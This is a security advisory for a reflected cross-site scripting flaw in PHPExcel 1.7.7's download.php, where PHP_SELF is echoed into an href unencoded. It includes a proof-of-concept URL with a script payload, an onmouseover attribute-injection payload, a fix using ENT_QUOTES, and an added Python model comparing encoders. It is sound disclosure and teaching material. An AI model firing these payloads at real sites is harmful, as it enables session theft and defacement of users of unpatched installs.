SSCHADV2012-020 - PHPExcel 1.7.7 Cross-Site Scripting vulnerability

Advisory:          PHPExcel 1.7.7 Cross-Site Scripting vulnerability
Advisory ID:       SSCHADV2012-020
Author:            Stefan Schurtz
Affected Software: Successfully tested on PHPExcel 1.7.7
Vendor URL:
Vendor Status:     informed
======================
Vulnerability Description
======================
PHPExcel 1.7.7 is prone to a reflected Cross-Site Scripting vulnerability. The documentation page download.php shipped under PHPExcel/Shared/JAMA/docs/ echoes $_SERVER['PHP_SELF'] into a single-quoted href attribute without encoding it. PHP_SELF is the script path plus any PATH_INFO the client appended after the script name, so the trailing part of that value is attacker-controlled and anything it contains is written straight into the page.
======================
Vulnerable code
======================
//download.php - PHP_SELF (script path plus client-supplied PATH_INFO) is echoed into the href attribute unencoded
<li><a href='<?php echo $_SERVER['PHP_SELF']."?op=download"; ?>'><?php echo $tarName ?></a></li>
======================
PoC-Exploit
======================
http://[target]/PHPExcel/Shared/JAMA/docs/download.php/'><script>alert('xss')</script>

The payload is passed as PATH_INFO after download.php and comes back through $_SERVER['PHP_SELF']; the leading single quote closes the href attribute and the > ends the <a> tag, so the script element is rendered as markup.
======================
Solution
======================
<li><a href='<?php echo htmlentities($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8')."?op=download"; ?>'><?php echo $tarName ?></a></li>

htmlentities() has to be told to encode quotes: with its default flags (ENT_COMPAT in PHP 5) it encodes &, <, > and double quotes but leaves the single quote alone, and because the href attribute here is single-quoted an attacker can still close the attribute and inject an event-handler attribute such as onmouseover. Passing ENT_QUOTES (or switching the attribute to double quotes) closes that gap.
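The following is an added example, not code from the advisory or from PHPExcel. It models the download.php template in Python: PHP_SELF is built from the script path plus PATH_INFO, dropped into the single-quoted href, and the result is parsed the way a browser would. Three encoders are compared: none (the vulnerable template), an ENT_COMPAT-style encoder that mirrors PHP 5's default htmlentities() behaviour, and an ENT_QUOTES-style encoder. The advisory's own payload and a second, constructed attribute-injection payload show that ENT_COMPAT stops the <script> tag but not the quote breakout, while ENT_QUOTES contains both. The $tarName value is a constructed placeholder; the script path is taken from the PoC URL.

```python
"""Added example, not code from the advisory or from PHPExcel: a Python model of
the download.php template and of PHP's HTML escaping flags."""
from html.parser import HTMLParser

# Script path as in the advisory's PoC; $tarName is assumed to be a fixed
# server-side string and is a constructed placeholder here.
SCRIPT_NAME = "/PHPExcel/Shared/JAMA/docs/download.php"
TAR_NAME = "Jama-1.0.2.tar"  # constructed placeholder


def php_self(script_name, path_info=""):
    """$_SERVER['PHP_SELF'] is the script path followed by whatever (decoded)
    PATH_INFO the client appended after the script name; that suffix is
    attacker-controlled."""
    return script_name + path_info


def no_encoding(s):
    """The vulnerable template: PHP_SELF echoed as-is."""
    return s


def ent_compat(s):
    """Mirrors htmlentities()/htmlspecialchars() with PHP 5's default flag
    ENT_COMPAT: & < > and double quotes are encoded, the single quote is not."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def ent_quotes(s):
    """Mirrors the same functions with ENT_QUOTES: single quotes become &#039;."""
    return ent_compat(s).replace("'", "&#039;")


def render_link(encoded_self, tar_name=TAR_NAME):
    """The markup download.php emits: the (possibly encoded) PHP_SELF lands
    inside a single-quoted href attribute."""
    return "<li><a href='%s?op=download'>%s</a></li>" % (encoded_self, tar_name)


class _Probe(HTMLParser):
    """Collects start tags and the attribute names seen on the <a> element."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.a_attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "a":
            self.a_attrs = [name for name, _ in attrs]


def audit(fragment):
    """Parse the emitted fragment like a browser and return
    (tags other than li/a, attributes on <a> other than href).
    Either list being non-empty means the attacker escaped the href value."""
    probe = _Probe()
    probe.feed(fragment)
    probe.close()
    unexpected_tags = [t for t in probe.tags if t not in ("li", "a")]
    injected_attrs = [n for n in probe.a_attrs if n != "href"]
    return unexpected_tags, injected_attrs


def exposure(path_info, encoder):
    """Render download.php for a request carrying the given PATH_INFO,
    with PHP_SELF passed through the given encoder, and audit the output."""
    return audit(render_link(encoder(php_self(SCRIPT_NAME, path_info))))


if __name__ == "__main__":
    # The advisory's PoC payload and a constructed attribute-injection variant.
    SCRIPT_PAYLOAD = "/'><script>alert('xss')</script>"
    ATTR_PAYLOAD = "/' onmouseover='alert(1)"
    encoders = (("none", no_encoding), ("ENT_COMPAT", ent_compat), ("ENT_QUOTES", ent_quotes))
    for name, enc in encoders:
        for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
            tags, attrs = exposure(payload, enc)
            print("%-10s %-36r tags=%r attrs=%r" % (name, payload, tags, attrs))
```

Run it directly to see the table: with no encoding the PoC yields a script tag; with ENT_COMPAT the script tag is gone but the onmouseover payload still lands as an attribute on the link; with ENT_QUOTES both payloads stay inside the href value.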
======================
Disclosure Timeline
======================
21-Aug-2012 – developer informed
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-020.txt